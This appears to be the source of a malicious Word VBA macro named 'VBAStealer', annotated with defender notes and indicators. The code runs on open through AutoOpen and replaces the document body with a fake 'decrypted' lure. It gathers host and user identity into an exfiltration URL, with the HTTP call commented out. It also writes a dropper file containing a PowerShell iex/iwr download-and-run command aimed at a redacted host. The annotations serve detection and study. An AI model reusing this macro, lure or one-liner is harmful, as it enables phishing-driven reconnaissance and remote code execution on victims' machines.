VBAStealer.vb
' Entry point. AutoOpen is a Word auto-macro name: Word runs it when the
' document is opened with macros enabled, so no further click is needed.
' Order matters for the lure: the document body is swapped first, then the
' host-information / dropper routine runs.
' Defender note: a document whose VBA project defines AutoOpen and also touches
' WinHttp or FileSystemObject is a strong triage signal; blocking macros in
' files that carry Mark-of-the-Web stops this chain before it starts.
Sub AutoOpen()
' Replace the visible document content with the "decrypted" lure text.
DeleteAndDecrypt
' Read host/user environment values and write the dropper file.
VBAStealer
End Sub
' Social-engineering lure. Selects the whole body of the active document,
' deletes it, and inserts a fixed string in its place. No decryption takes
' place: the routine only makes it look as if enabling macros unlocked the file.
Sub DeleteAndDecrypt()
'Delete encrypted content after enabling macros
' (the original body is presumably unreadable placeholder text - not visible in this listing)
ActiveDocument.Content.Select
Selection.Delete
' Fixed replacement text shown to the user; usable as a static string indicator.
Selection.InsertBefore Text:="Decrypted content!!!"
End Sub
' Issues one HTTP GET to the given URL through the WinHttp COM object.
'   url - full request URL; the caller appends the collected values as a query string.
' The function never assigns a return value and never reads the response, so
' the outbound request itself is the whole effect.
' Defender notes:
'   - The object is created late-bound via CreateObject, so the ProgID string
'     "WinHttp.WinHttpRequest.5.1" appears verbatim in the macro source.
'   - The User-Agent header is hard-coded to "EvilMacroV1.0"; that value is a
'     direct proxy / web-gateway indicator for this sample.
'   - An Office process making outbound HTTP through WinHttp is worth alerting on.
Public Function Exer(url As String)
With CreateObject("WinHttp.WinHttpRequest.5.1")
' Third argument False = synchronous request (the macro blocks until it completes).
.Open "GET", url, False
.setRequestHeader "User-Agent", "EvilMacroV1.0"
.Send
End With
End Function
' Collection + dropper routine. In order, it:
'   1. reads COMPUTERNAME, USERNAME, USERDOMAIN and USERPROFILE from the environment,
'   2. builds a URL whose query string carries those values,
'   3. shows a reassuring message box,
'   4. writes a text file containing a PowerShell download-and-run one-liner,
'   5. attempts to rename that file to a .bat extension.
' In this listing the HTTP call is commented out and no statement launches the
' written file, so the exfiltration and execution stages are not active as shown.
' The <SERVERIP>, <FILEPATH> and <IP_ADDRESS> values are redacted placeholders.
' Defender notes: Office writing a script/batch file to disk and PowerShell
' command lines combining iex with iwr are the behaviours to detect or block
' (for example with attack-surface-reduction rules that stop Office applications
' from creating executable content or child processes).
Sub VBAStealer()
Dim hostname As String
Dim username As String
Dim domain As String
' Host and user identity read from process environment variables.
hostname = Environ("COMPUTERNAME")
username = Environ("USERNAME")
domain = Environ("USERDOMAIN")
' profile is never declared with Dim; it is used as an implicit variable here.
profile = Environ("USERPROFILE")
' username now holds "<user>/<domain>", so the domain ends up in the URL twice.
username = username + "/" + domain
Dim url As String
' Ip is declared but not used anywhere in this routine.
Dim Ip As String
' server1 and server2 are also undeclared; both are redacted placeholders that
' are concatenated to form the base of the URL.
server1 = "<SERVERIP>"
server2 = "<SERVERIP>"
' Query string layout: hostname=..&username=..&domain=..&profile=..
' As written, the final parameter is the literal text "profile", not the value
' read from USERPROFILE - relevant when matching this sample's traffic.
url = server1 + server2 + "?" + "hostname=" + hostname + "&" + "username=" + username + "&" + "domain=" + domain + "&" + "profile=" + "profile"
' res is declared for the call below, which is disabled in this listing.
Dim res As String
' exfiltrate data using HTTP
'res = Exer(url)
' Second lure: tells the user the file is now viewable.
MsgBox ("You can now view the file!")
' Create a file dropper
Dim filePath As String
filePath = "<FILEPATH>" ' make a .txt file
Dim fso As FileSystemObject
Set fso = New FileSystemObject
Dim fileStream As TextStream
Set fileStream = fso.CreateTextFile(filePath)
' File content is a PowerShell one-liner that fetches a remote resource with
' iwr (Invoke-WebRequest) and passes it to iex (Invoke-Expression).
fileStream.WriteLine "powershell.exe iex (iwr http://<IP_ADDRESS>/MalTest)"
fileStream.Close
' Name ... As ... is VBA's file-rename statement; the intent is to give the
' written file a .bat extension.
' NOTE(review): the new name is written as filepath.bat rather than a string
' expression - confirm how this line is treated before relying on the rename.
Name filepath As filepath.bat
' execute bat file
' (no statement follows the comment above; nothing in this listing runs the file)
End Sub